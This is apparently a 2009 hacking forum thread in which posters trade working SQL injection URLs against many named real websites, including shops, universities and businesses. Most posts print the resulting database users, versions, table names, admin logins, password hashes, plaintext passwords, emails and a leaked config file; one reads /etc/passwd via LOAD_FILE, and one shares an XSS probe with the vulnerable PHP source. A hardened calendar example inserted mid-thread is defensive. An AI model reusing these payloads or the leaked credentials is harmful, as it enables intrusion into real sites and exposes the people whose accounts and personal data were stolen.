taiwanrice.com
http://taiwanrice.com/upload/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat _ws(0x3a,user(),database(),version()),8/*
tinwhang@localhost:ecshop:5.0.45
http://taiwanrice.com/upload/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,table_ name,8%20from%20information_schema.tables+limit+1, 1/*
44 tables
http://taiwanrice.com/upload/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat _ws(0x3a,user_name,password),8%20from%20ecs_users/*
users:
email,login,hash,password
ecs_admin_user
'tinwhang', '888@go56.net', 'f50ea380584f8fa388cf45bc5366f3fa:inmine00'
PR:0
TIC:0
http://www.dreambabys.nl/reborn-baby.php?id=-35+union+select+1,2,3,0x7265616c20706f63616e69,5,6 ,7,8,9,10,11,12,13--
5.0.51a-community
_SEREGA_
03.05.2009, 13:15
SQLi:
http://www.amerimar.com/team.php?id=-10+union+select+1,2,3,4,5,6--
version:
http://www.amerimar.com/team.php?id=-10+union+select+1,version(),3,4,5,6--
5.0.67
info:
http://www.amerimar.com/team.php?id=-10+union+select+1,concat_ws(0x3a,user()),3,4,5,6--
amerimar@72.167.183.41
tables are output using limit.
http://www.amerimar.com/team.php?id=-10+union+select+1,table_name,3,4,5,6+from+informat ion_schema.tables--
DezMond™
03.05.2009, 13:57
http://www.nano.gatech.edu/news/release.php?id=-2540+union+select+1,2,3,4,table_name,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, 45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61 ,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,7 8,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94, 95,96+from+information_schema.tables+limit+282,100 0--
Tables:
user_roles
user_profiles
user_logins
b.gonzalez:a9fbdd1e49f69d2e46c3f9baf93d092b:0
j.swaby:edff5064c3f51437182395bf4f77f0b3:js333
_SEREGA_
03.05.2009, 14:08
SQLi:
http://www.zimsculpt.com/artist.php?id=-10+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20--
version:
http://www.zimsculpt.com/artist.php?id=-10+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20--
4.1.20 =(
info:
http://www.zimsculpt.com/artist.php?id=-10+union+select+1,concat_ws(0x3a,user(),database() ),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
user() z887hhH1q@localhost
database() zimsculpt
erihtoney
03.05.2009, 14:38
PR:4
MSU Physics and Astronomy Department
http://support.pa.msu.edu/howto.php?id=9999%20UNION%20SELECT%201,2,3,concat_ ws(0x3a,version(),user(),database()),
5,6,7,8,0,0,0,0,0,0/*
version:4.1.22
user:smgr@kronos-pa.pa.msu.edu
database:supportsite
http://support.pa.msu.edu/howto.php?id=9999%20UNION%20SELECT%201,2,3,version (),char(60,97,32,104,114,101,102,61,39,104,116,116 ,112,58,47,47,106,108,111,100,103,101,46,99,111,10 9,47,117,110,105,111,110,47,109,97,112,46,104,116, 109,108,39,62,117,110,105,111,110,60,47,97,62),6,7 ,8,0,0,0,0,0,0/*
<<Role-playing game "На той Гражданской">>
http://cwar.holdgold.ru/page.php?id=143+union+select+1,2,concat_ws(0x3a,ve rsion(),database(),user(),@version_compile_os),4,5--+
5.0.67-log:u9753_holdgold:u9753@10.10.153.162
_SEREGA_
03.05.2009, 16:59
SQLi:
http://www.propville.com/viewPress.php?id=-10+union+select+1,2,3,4--
version:
http://www.propville.com/viewPress.php?id=-10+union+select+1,2,version(),4--
4.1.20 damn, <5 =)
info:
http://www.propville.com/viewPress.php?id=-10+union+select+1,2,concat_ws(0x3a,user(),database ()),4--
user() propville@216.119.125.2
database() propville
http://www.sorbents.ru/products/product.php?id=-985+union+select+concat_ws(0x3a,version(),database (),user()),2,3--
5.0.45-log:usorbents14:usorbents14@localhost
http://www.sorbents.ru/products/product.php?id=-985+union+select+group_concat(table_name),2,3+from +information_schema.tables
http://aap.usluga21.ru/product.php?id=-19+union+select+1,2,unhex(hex(concat_ws(0x3a,versi on(),database(),user()))),4,5,6,7,8,9,10,11,12,13, 14,15--
4.1.18-standard:db_usluga215:usluga215@localhost.localdom ain
// the anti-repost check isn't working
HAXTA4OK
03.05.2009, 20:48
http://www.metalsrepublic.ie/temp.php?id=1&image=-6+union+select+1,concat_ws(0x3a,version(),database (), user()),3,4--
5.0.51a-log:370900_metals:370900_metals@172.17.2.130
PR: 4
_SEREGA_
03.05.2009, 21:21
SQLi:
http://www.fullframefest.org/more_film_info.php?id=-30+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19--
version:
http://www.fullframefest.org/more_film_info.php?id=-30+union+select+1,2,version(),4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19--
5.0.67
tables are listed using limit
http://www.fullframefest.org/more_film_info.php?id=-30+union+select+1,2,table_name,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19+from+information_schema.tab les--
info:
http://www.fullframefest.org/more_film_info.php?id=-30+union+select+1,2,concat_ws(0x3a,user(),database ()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
user() fullfram_admin@localhost
database() fullfram_films
Both SQLi have File_priv = Y
Dating site)
_http://www.privat.nnover.ru/skazka.php?id=-1975'+union+select+1,concat_ws(0x3a,user,password, file_priv),3+from+mysql.user+limit+0,1--+
Version 5
Russian rap, what the hell.... :(
_http://www.rapway.com.ua/bio.php?id=-7+union+select+1,2,concat_ws(0x3a,user,password,fi le_priv),4+from+mysql.user+limit+0,1--
Version():5
Skofield
03.05.2009, 22:09
http://www.gotennis.ru
http://www.gotennis.ru/players/index.php?id=-9999+union+select+1,2,3,4,5,6,concat_ws(0x3a,versi on(),database%20(),%20user()),8,9,10,11,12,13,14,1 5,16,17,18/*
5.0.37-standard-log:gotennis:gotennis_gotenni@localhost
HAXTA4OK
03.05.2009, 22:25
http://imhc.ie/newsRoom/newsRoomItem.php?id=-1+union +select+1,concat_w s(0x3a,version(),database(),user()),3,4,5,6--
5.0.45-community-log:imhc200_mainSite:imhc200_webuser@win9.hosting3 65.ie
PR: 5
[x59]ReV
03.05.2009, 22:27
account database of http://rocid.ru
dumped thanks to a vulnerability in one of the rocid.ru projects
_http://2008.rif.ru/system/remote/get.program.reports.php?id=-739+union+select+concat_ws(0x3a,rocid,password),2+ from+user%23
part of it
about 40% of the passwords are numeric.
HAXTA4OK
03.05.2009, 22:37
http://www.armchair.ie/tell_friend.php?id=-1+union+select+1,2,concat_ws(0x3a,ve rsion(),data base(),u ser()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30--
5.0.51a-3ubuntu5.4-log:armchair:armchair@localhost
PR: 2
[x59]ReV
03.05.2009, 22:37
XSS & SQL-inj in a calendar script.
2) the telltale sign is a link of the form /news/?_Year=2009&_Month=4&_Day=10
3)news/?_Year=2009&_Month=4'&_Day=10 sql-inj
4)news/?_Year=2009&_Month=4</script><script>alert(/xss/)</script>&_Day=10
the vulnerable script itself
<?
global $DOCUMENT_ROOT;
$DOCUMENT_ROOT = $_SERVER['DOCUMENT_ROOT'];
include "$DOCUMENT_ROOT/manage/inc/all.php";
if (!((isset($_Year)) && (isset($_Month)) && (isset($_Day)) && (isset($id))))
print 'Ошибка календаря';
else
{
$id = content_get_initial($id);
$iface = content_lookup_id($id);
$Months = array ("","is_January", "is_February", "is_March", "is_April", "is_May", "is_June", "is_July", "is_August", "is_September", "is_October", "is_November", "is_December");
$DoDays = array (31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31);
$LDoDays = array (31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31);
$p_m = $iface->GetPredYM($_Month,$_Year);
$p_m = explode('_',$p_m);
$n_m = $iface->GetNextYM($_Month,$_Year);
$n_m = explode('_',$n_m);
$prev_Month = mktime (0,0,0,$p_m[0], 1, $p_m[1]);
$next_Month = mktime (0,0,0,$n_m[0], 1, $n_m[1]);
//$prev_Month = mktime (0,0,0,$_Month-1, 1, $_Year);
//$next_Month = mktime (0,0,0,$_Month+1, 1, $_Year);
$MaxDay = date("t",mktime (0,0,0,$_Month, 1, $_Year));
$prev_MaxDay = date("t",$prev_Month);
$next_MaxDay = date("t",$next_Month);
$firstYM = explode('-', $iface->GetFirstYM());
$lastYM = explode('-', $iface->GetLastYM());
?>
<div id="months"><?if (!(($_Month==$firstYM[1]) && ($_Year==$firstYM[0]))) {?><a href="#" class="prev" onclick="get_request('/inc/calendar.php?_Year=<?=date("Y",$prev_Month)?>&_Month='+parseInt(<?=date("m",$prev_Month)?>,10)+'&_Day=0&id=<?=$id?><?=((isset($pub))? "&pub=".$pub: "")?>'); return false;"><img src="/pics/larr.gif" alt="<-" width="14" height="7"></a><?} else {?><a><img src="/pics/clear.gif" width="14" height="7"></a><?};?><?=$Months[$_Month]." ".$_Year?><?if (!(($_Month==$lastYM[1]) && ($_Year==$lastYM[0]))) {?><a href="#" class="next" onclick="get_request('/inc/calendar.php?_Year=<?=date("Y",$next_Month)?>&_Month='+parseInt(<?=date("m",$next_Month)?>,10)+'&_Day=0&id=<?=$id?><?=((isset($pub))? "&pub=".$pub: "")?>'); return false;"><img src="/pics/rarr.gif" alt="->" width="14" height="7"></a><?} else {?><a><img src="/pics/clear.gif" width="14" height="7"></a><?}?></div>
<table>
<tr>
<th>is_PN</th>
<th>is_VT</th>
<th>is_SR</th>
<th>is_CT</th>
<th>is_PT</th>
<th>is_SB</th>
<th>is_VS</th>
</tr>
<?
print '<tr>';
$weekdayfirst = date("w",mktime (0,0,0,$_Month, 1, $_Year));
if ($weekdayfirst=='0')
$weekdayfirst = 7;
$dayweek = $weekdayfirst-1;
$firstdate = $prev_MaxDay - $weekdayfirst+2;
for ($j=$firstdate;$j<=$prev_MaxDay;$j++)
print '<td class="empty">'.$j.'</td>';
for ($i=1;$i<=$MaxDay;$i++)
{
$dayweek=$dayweek+1;
if (($dayweek%7==1) && ($dayweek!=$weekdayfirst))
print '</tr>
<tr>';
if (($i==date("d")) && ($_Month==date("m")) && ($_Year==date("Y")))
{
if (($iface->IsThisDatePub($_Year,$_Month,$i)) && ((isset($pub)) || ($i!=$_Day)))
print '<td class="current"><a href=".?_Year='.$_Year.'&_Month='.$_Month.'&_Day='.$i.'">'.$i.'</a></td>';
else
print '<td class="current">'.$i.'</td>';
}
elseif (($iface->IsThisDatePub($_Year,$_Month,$i)) && ((isset($pub)) || ($i!=$_Day)))
print '<td><a href=".?_Year='.$_Year.'&_Month='.$_Month.'&_Day='.$i.'">'.$i.'</a></td>';
else
print '<td>'.$i.'</td>';
}
$j=0;
while ($dayweek%7>=1)
{
$dayweek=$dayweek+1;
$j=$j+1;
print '<td class="empty">'.$j.'</td>';
}
print '</tr>';
?>
</table>
<?
}
?>
izhevsk.citysvyaz.ru
http://izhevsk.citysvyaz.ru/news/?_Year=2009&_Month=4+union+select+1,2,user(),version(),5--&_Day=8
http://izhevsk.citysvyaz.ru/info.php
root@localhost
5.0.45-community-nt-log
http://izhevsk.citysvyaz.ru/in2.php
samara.citysvyaz.ru
http://samara.citysvyaz.ru/info.php
http://samara.citysvyaz.ru/news/?_Year=2009&_Month=2+union+select+1,2,user(),version(),5--&_Day=5
gorsvyaz@localhost
5.0.45-community-nt-log
omsk.citysvyaz.ru/
http://omsk.citysvyaz.ru/info.php
http://omsk.citysvyaz.ru/news/?_Year=2009&_Month=4+union+select+1,2,user(),version(),5--&_Day=17
root@localhost
5.0.45-community-nt-log
nsk.citysvyaz.ru/
http://nsk.citysvyaz.ru/news/?_Year=2009&_Month=3+union+select+1,2,user(),version(),5--&_Day=11
nsk_citysvyaz@212.33.233.190
5.0.32-Debian_7etch8-log
tmn.citysvyaz.ru/
http://tmn.citysvyaz.ru/info.php
http://tmn.citysvyaz.ru/news/?_Year=2009&_Month=4+union+select+1,2,user(),version(),5--&_Day=6
root@localhost
5.0.45-community-nt
chel.citysvyaz.ru/
http://chel.citysvyaz.ru/news/?_Year=2009&_Month=4+union+select+1,2,user(),version(),5--&_Day=5
root@localhost
5.1.19-beta-community-nt-debug
nch.citysvyaz.ru
http://nch.citysvyaz.ru/news/?_Year=2007&_Month=9+union+select+1,2,user(),version(),5--&_Day=26
root@localhost
5.0.45-community-nt
http://iskra.lysva.ru/news/?_Year=2009&_Month=4+union+select+1,2,user(),4,5,6,7%20--%20&_Day=11&PHPSESSID=e06ad578342540fd0f4e81c6d63caad3
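A hardened counterpart to the calendar script in the post above, as an added example that is not part of the original post or of the site's code: `_Year`, `_Month` and `_Day` are accepted only as bounded integers, the date lookup uses a bound parameter, and the link is HTML-escaped. The function names, the `news` table with its `pub_date` column, and the in-memory SQLite database are assumptions made for the demonstration.

```php
<?php
declare(strict_types=1);

/**
 * Parse one calendar parameter as a bounded integer.
 * Anything that is not a short string of decimal digits in range yields null,
 * so "4'" or "4</script>..." never reaches SQL or HTML. Array input
 * (?_Month[]=4) is rejected by the is_string() check.
 */
function calendar_int(array $query, string $name, int $min, int $max): ?int
{
    $raw = $query[$name] ?? null;
    if (!is_string($raw) || !ctype_digit($raw) || strlen($raw) > 4) {
        return null;
    }
    $value = (int) $raw;
    return ($value >= $min && $value <= $max) ? $value : null;
}

/**
 * Validate the three parameters together. _Day=0 is allowed because the
 * script's own month-navigation links use it for "no day selected".
 */
function calendar_params(array $query): ?array
{
    $year  = calendar_int($query, '_Year', 1970, 2100);
    $month = calendar_int($query, '_Month', 1, 12);
    $day   = calendar_int($query, '_Day', 0, 31);
    if ($year === null || $month === null || $day === null) {
        return null;
    }
    if ($day !== 0 && !checkdate($month, $day, $year)) {
        return null;
    }
    return ['year' => $year, 'month' => $month, 'day' => $day];
}

/** Date lookup with a bound parameter (hypothetical table news, column pub_date). */
function is_date_published(PDO $db, int $year, int $month, int $day): bool
{
    $stmt = $db->prepare('SELECT COUNT(*) FROM news WHERE pub_date = :d');
    $stmt->execute([':d' => sprintf('%04d-%02d-%02d', $year, $month, $day)]);
    return (int) $stmt->fetchColumn() > 0;
}

/** Render one day cell; the query string is built, then HTML-escaped. */
function day_cell(int $year, int $month, int $day, bool $published): string
{
    if (!$published) {
        return '<td>' . $day . '</td>';
    }
    $href = '.?' . http_build_query(['_Year' => $year, '_Month' => $month, '_Day' => $day]);
    return '<td><a href="' . htmlspecialchars($href, ENT_QUOTES, 'UTF-8') . '">' . $day . '</a></td>';
}

// Constructed demo data: in-memory SQLite stands in for the site's database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE news (pub_date TEXT)');
$db->exec("INSERT INTO news VALUES ('2009-04-10')");

// Constructed requests: one normal link, the two probes quoted in the post,
// an array-valued parameter and an impossible date.
$requests = [
    ['_Year' => '2009', '_Month' => '4', '_Day' => '10'],
    ['_Year' => '2009', '_Month' => "4'", '_Day' => '10'],
    ['_Year' => '2009', '_Month' => '4</script><script>alert(/xss/)</script>', '_Day' => '10'],
    ['_Year' => '2009', '_Month' => ['4'], '_Day' => '10'],
    ['_Year' => '2009', '_Month' => '2', '_Day' => '30'],
];

foreach ($requests as $query) {
    $p = calendar_params($query);
    if ($p === null) {
        echo "rejected\n";
        continue;
    }
    $published = is_date_published($db, $p['year'], $p['month'], $p['day']);
    echo day_cell($p['year'], $p['month'], $p['day'], $published), "\n";
}
```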
beerhack
03.05.2009, 23:02
http://www.uark.edu/ua/wxl02/report.php?trm=-99999+union+select+version(),2,3,4,5,6,7,8--
Database Version: 5.0.75-log
--------------------------------------------------------------------
http://artdesign.calpoly.edu/alumni.php?year=-99999+union+select+1,2,3,4,5,6,7,8,9,concat_ws
(0x3a,user,password),11,12+from+mysql.user--
root:wusthof
--------------------------------------------------------------------
http://nkuconnections.nku.edu/detail.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM +INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN +('VwDictionary','dtproperties','sysconstraints',' syssegments','TblAbout','tblBuildingCodes','tblCat egory','TblCustom','TblCustomFields','tblEvents',' tbleventshack','tbleventshack2','TblLog','tblPartI ','tblPartII','tblPartIII','tblPartIV','tblPhotos' ,'tblSchedules','tblSecurity','vwevents','vwListEv ents'))
HAXTA4OK
03.05.2009, 23:41
free TV (thinking of messing around with update)
http://www.freetv.fr/tv.php?id=1+union+select+1,2,concat_ws(0x3a,ve rsion(),datab ase(),us er()),4,5,6,7,8,9,10,11,12--
5.0.68-log:freetvsql:freetvsql@10.0.65.48
PR: 2
..::TROYAN::..
03.05.2009, 23:59
a couple more shops...
ec.kyict.com.tw
http://ec.kyict.com.tw/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat (user_name,0x7c,password,0x7c,email),8%20from%20ec s_admin_user/*
admin:hi7410
Tables:
http://ec.kyict.com.tw/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,table_ name,8%20from%20information_schema.tables/*
A chunk of the users table dump:
Admin panel:
http://ec.kyict.com.tw/admin/index.php
Login:admin
Pass:hi7410
OS: WINDOWS
PR:0
www.mjholly.com
http://www.mjholly.com/ecshop/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,table_ name,8%20from%20information_schema.tables/*
config.php
<?php
// database host
$db_host = "localhost:3306";
// database name
$db_name = "vhost15459-1";
// database username
$db_user = "vhost15459";
// database password
$db_pass = "phoebe";
// table prefix
$prefix = "ecs_";
$timezone = "Asia/Shanghai";
$cookie_path = "/";
$cookie_domain = "";
$admin_dir = "admin";
$session = "1440";
?>
Admin
http://www.mjholly.com/ecshop/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat (user_name,0x7c,password,0x7c,email),8%20from%20ec s_admin_user/*
mok579:a4836cd6d94d73eac97cdff2c47aab5f:jerry@mjho lly.com
Users:
http://www.mjholly.com/ecshop/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat (user_name,0x7c,password,0x7c),8%20from%20ecs_user s/*
A chunk of the dump from the users table:
PR:2
ILYAtirtir
04.05.2009, 07:42
Armand Group
http://www.armand-cadillac.ru/news/newsitem.php?id=-11+union+select+1,2,concat_ws(0x3a,database(),user (),version()),4,5,6,7,8,9,10§ion=archive
u30316_cadillac:u30316@10.10.11.124:5.0.51-log
http://www.armand-chevrolet.ru/company/news/article/?id=19+union+select+1,2,concat_ws(0x3a,database(), user(),version()),4,5,6,7,8,9,10,11,12,13,14,15§ion=new
u30316_chevrolet:u30316_chevrolet@10.10.11.124:5.0 .51-log
http://www.armand-hummer.ru/news/newsitem.php?id=16+and+1=2+union+select+1,2,concat _ws(0x3a,database(),user(),version()),4,5,6,7,8,9, 10§ion=new
u30316_hummer:u30316@10.10.11.124:5.0.51-log
http://www.armand-opel.ru/company/news/article/?id=15+union+select+1,2,concat_ws(0x3a,database(), user(),version()),4,5,6,7,8,9,10,11,12,13,14,15§ion=new
u30316_opel:u30316_opel@10.10.11.124:5.0.51-log
http://www.armand-cadillac.ru/news/newsitem.php?id=-11+union+select+1,2,concat_ws(0x3a,username,passwo rd,email),4,5,6,7,8,9,10+from+u30316.vb_user+limit +x,1
Mitridat:8fa28933e324369750ae85d026ba0b8c:galkin@a rmand.ru
FRM:d47748d5f5aa908c631dcecedfcef3af:frm@armand-group.ru
freemind:237d87b028023a3840331ae2cba2a7fb:freemind 01@gmail.com
Екатерина:820ef0cc6e148bbec7f9631338e84ee 4:e_kosatkina@armand-premium.ru
tabak72:96f74539d3b453aba888f1f01224509f:tabak72@m ail.ru
ulceple:9b0335d4d6ec5b8f046ebf34b128b022:svetlanal eopoldovna@gmail.com
http://www.armand-cadillac.ru/news/newsitem.php?id=-11+union+select+1,2,concat_ws(0x3a,hash,access),4, 5,6,7,8,9,10+from+u30316_cad_stat.cns_adminsession s
13ca4314d25cb955c1228a4393b77c54:admin
HAXTA4OK
04.05.2009, 10:46
http://www.otoplenie.eu/php/firm_profiles.html?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,data base(),user(),ver sion()),8,9,10,11,12,13,14,15,16,17,18,19,20,21--
otopleni_otoplenie:otopleni_otoplen@localhost:5.0. 67-community
------------------------------------------------------------------------
http://travelexpresbg.com/page.php?id=-1+union+select+1,concat_ws(0x3a,dat abase(),u ser(),versi on())--
travelex_te:travelex_te@localhost:5.0.67-community-log
BlackPanther
04.05.2009, 10:55
Continuing the shop theme-
http://www.vostart.com/web/eng/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat (user_name,0x7c,password,0x7c,email),8%20from%20ec s_admin_user/*
[PR 4]
http://www.wedasoft.at/en/product.php?id=-1+union+select+1,2,3,unhex(hex(concat_ws(0x3a,vers ion(),database(),user()))),5,6,7,8,9,10,11,12,13,1 4,15,16,17,18--
4.1.15-Debian_0.dotdeb.4-log:wedasoft:wedas@localhost
[PR 3]
http://zonadostupa.ru/product.php?id=5814+union+select+concat_ws(0x3a,ve rsion(),database(),user())
4.1.22-log:wwwzonadostuparu:zonado02@fe30.hc.ru
HAXTA4OK
04.05.2009, 12:20
http://www.arcadi.fr/rendezvous/rv.php?id=-1'+union+select+1,2,concat_ws(0x3a,database(),use r(),versio n()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23/*
arcadi_web2:arcadi_web2@bizmachine8.co.fr.clara.ne t:5.0.33-log
PR: 6
Target: www.racingimages.cc
Evil link: http://www.racingimages.cc/news.php?id=-119'+union+select+1,2,3,4,5,6,7/*
Database info:
user: racingimages@localhost
database: racingimages
version: 4.1.22-standard
Users (http://www.racingimages.cc/news.php?id=-119'+union+select+1,2,3,4,concat_ws(0x3a,login,pas sword),6,7+from+user/*)
vmt:$1$lNZVfFdL$10UMAm9L.FzCOax66mCJq/
lauri:$1$bNYsaYKl$BQPISnslvc2/5rC1G.XrO0
matti:$1$kMifYQzs$.JSbo5Wzyl2gfpJ79HF7J/
Couldn't find the admin panel :(
..::TROYAN::..
04.05.2009, 13:04
Hip-hop portal
www.hiphopbase.ru
http://hiphopbase.ru/HipHopBase.php?site_page=111&id=-663+union+select+1,2,concat_ws(0x3a,user(),version (),database()),4,5,6,7,8,9,10,11--
hiphopb4@localhost:4.1.22-log:hiphopb4_hhbasedb
PR:1
TIC:10
HAXTA4OK
04.05.2009, 14:52
http://www.taxi-control.ru/index.php?id=-1+union+select+1,concat_ws(0x3a,database(),use r(),versio n()),3--
taxicontrol:taxicontrol@zvm4.host.ru:4.0.27-log
Skofield
04.05.2009, 15:18
http://www.sportstarmanagement.com PR 5
http://www.sportstarmanagement.com/News.php?ID=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7/*
4.1.22-standard:sportsta_sportstardb:sportsta_sportst@loc alhost
mailbrush
04.05.2009, 15:39
http://www.lordsofmetal.nl/crew.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,user(),dat abase(),version()),7,8,9,10,11,12,13,14,15,16,17,1 8,19mblofmetal_lom@localhost:mblofmetal_lom:5.0.51 a-community-log
http://www.bulfurniture.com/php/products.html?id=1
Blind
User: bulfurniture@localhost
DB: bulfurniture
Version: 4.0.24_Debian-10sarge3-log
Getting the user, DB and version took 90 MB of traffic.
_http://www.hunt-shop.ru/info.php?id=-24940+union+select+1,2,3,4,pass,6,7,8,9+from+admin--
{print in title}
4.0.27-log:hunt-shop@zvm13.host.ru:hunt-shop
Admin:password
_http://www.sport-timing.sk/shop/index.php?way=Tovar&goods_id=-470+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x 3a,version(),user(),database()),12,13,14,15,16--+
5.1.24-rc:sporttiming@localhost:sporttiming
_http://www.toddycafe.com/shop/product.php?productId=-67'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat _ws(0x3a,version(),user(),database()),14,15,16,17--+
5.0.37-community:toddycafe@localhost:toddycafe
_http://www.antiqueshop.ee/icons/aikon.php?id=-109+union+select+1,2,3,4,5,concat_ws(0x3a,version( ),user(),database())--
5.0.67-log:virt1393usr@z136.zone.ee:virt1393
_http://www.santa.su/shop/?dir=1&pid=683'+union+select+concat_ws(0x3a,version(),use r(),database()),2,3,4,5--%20-
{print in source}
5.0.45:santa_su@localhost:db_santa_su
:(
LLC “RostInvestLizing”, together with the West Ural Bank of Sberbank of Russia, invests in over 200 enterprises.
http://ril.ru/news/?id=30+and+1=0+union+select+1,2,version(),4,5,6,7--
_SEREGA_
04.05.2009, 19:26
SQLi: http://www.learnbirdsongs.com/birdsong.php?id=-5+union+select+1,2,3,4,5,6,7,8,9--
version: http://www.learnbirdsongs.com/birdsong.php?id=-5+union+select+1,2,3,4,version(),6,7,8,9--
5.0.27
tables are listed using limit:
http://www.learnbirdsongs.com/birdsong.php?id=-5+union+select+1,2,table_name,4,5,6,7,8,9+from+inf ormation_schema.tables--
infa:
http://www.learnbirdsongs.com/birdsong.php?id=-5+union+select+1,2,3,4,concat_ws(0x3a,user(),datab ase()),6,7,8,9--
user() webtoad@localhost
database() jfdavis_webtoad
mailbrush
04.05.2009, 21:01
http://www.design.ucla.edu/people/grad.php?ID=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user() ,database(),version()),9,10,11
dma@constitution.design.ucla.edu:dma:5.0.45
P.S. Has Achat gone rainbow style now?
Skofield
04.05.2009, 21:38
http://goglobal.fiu.edu
http://goglobal.fiu.edu/news.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8,9,19,11,12/*
4.1.14-nt:goglobal:goglobalUser@GOPANTHER.fiu.edu
_SEREGA_
04.05.2009, 21:45
SQLi:
http://www.aroma.us/info_page.php?id=-5+union+select+1,2,3,4,5--
version:
http://www.aroma.us/info_page.php?id=-5+union+select+1,2,version(),4,5--
5.0.67
tables are output with limit:
http://www.aroma.us/info_page.php?id=-5+union+select+1,2,table_name,4,5+from+information _schema.tables--
info:
http://www.aroma.us/info_page.php?id=-5+union+select+1,2,concat_ws(0x3a,user(),database( )),4,5--
user() aroma15_aromasho@localhost
database() aroma15_aromaonline
mailbrush
04.05.2009, 21:51
Penza Regional Center for Internet Education
TIC: 325
PR: 4
http://rcio.pnzgu.ru/grad.php?id=4801
Blind, since it's the 3.x branch - there's no union...
fio@localhost - User
fio - DB
3.23.58 - Version
_SEREGA_
04.05.2009, 22:13
SQLi:
http://www.exhibitionsireland.com/eventsdetails.php?id=5+union+select+1,2,3,4,5,6,7, 8--
version:
http://www.exhibitionsireland.com/eventsdetails.php?id=5+union+select+1,version(),3, 4,5,6,7,8--
5.0.24
list of tables:
http://www.exhibitionsireland.com/eventsdetails.php?id=5+union+select+1,table_name,3 ,4,5,6,7,8+from+information_schema.tables--
we see the table login
list of columns:
http://www.exhibitionsireland.com/eventsdetails.php?id=5+union+select+1,column_name, 3,4,5,6,7,8+from+information_schema.columns--
we see the columns: user and pass
output the info:
user:
http://www.exhibitionsireland.com/eventsdetails.php?id=5+union+select+1,user,3,4,5,6 ,7,8+from+login--
pass:
http://www.exhibitionsireland.com/eventsdetails.php?id=5+union+select+1,pass,3,4,5,6 ,7,8+from+login--
info:
user: exhibit001
pass: ireland2
didn't find the admin panel =((((((((
Skofield
04.05.2009, 22:20
http://www.vdostudio.com
http://www.vdostudio.com/webboard/view.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
version() - 5.0.22
database() - vdostudio
-m0rgan-
04.05.2009, 22:21
http://www.tepg.se/showtitle.php?id=-1+union+all+select+0,1,CONCAT_WS(CHAR(32,58,32),us er(),database(),version()),3,4,5--
user/db/version:
wonderwork_db1@192.168.0.56 : wonderwork_db1 : 5.0.51a-24-log
Admin:
http://www.tepg.se/showtitle.php?id=-1+union+all+select+0,1,CONCAT_WS(CHAR(32,58,32),id ,username,password),3,4,5+from+admin--
id/login/pass:
1 : hdnine : cb7ea8e5ad69ce0be6c3f1f0032dad4a
AkyHa_MaTaTa
04.05.2009, 22:30
nfca.org(with file_priv) pr - 6:
http://www.nfca.org/top25/index.php?cat_id=1&poll_id=-234271+union+select+1,2,3,4,5,concat_ws(0x3A,user( ),version(),database()),LOAD_FILE(0x2f6574632f7061 73737764),8--+
dbclient@69.94.233.43:4.0.24-log:ism_data_nfca
-m0rgan-
04.05.2009, 23:10
http://www.autokom.cz/newsdetail.php?id=-1+union+all+select+0,1,2,3,4,CONCAT_WS(CHAR(32,58, 32),user(),database(),version()),6--
user/db/version:
www_autokom_cz@localhost : www_autokom_cz : 5.0.45
mailbrush
04.05.2009, 23:57
http://www.black-time.net/usr.php?act=com&id_obj=-1+union+select+1,2,3,4,5,6,UNHEX(HEX(concat_ws(0x3 a,user(),database(),version()))),8,9,10,11,12,13,1 4
black-time@ipx10233.ipxserver.de:black-time:4.1.8-standard
Skofield
05.05.2009, 02:08
http://www.ftlauderdalenews.net (PR3)
http://www.ftlauderdalenews.net/news.php?id=1+union+select+1,2,3,concat_ws(0x3a,ve rsion(),database(),user()),5,6,7,8+from+users/*
4.1.20-max-log:Promena_news:Promena_pubuser@76.162.254.225
http://www.ftlauderdalenews.net/news.php?id=1+union+select+1,2,3,concat_ws(0x3a,pa ssword,name),5,6,7,8+from+users/*
name : Ray Brasted
password : 1x2y3z
-m0rgan-
05.05.2009, 08:23
http://www.cfs-nl.ca/media-read.php?id=-1+union+all+select+0,1,2,3,4,5,CONCAT_WS(CHAR(32,5 8,32),user(),database(),version()),7,8,9,10,11,12--
user/db/version:
cfsnl_admin@localhost : cfsnl_admin_old : 5.0.45-log
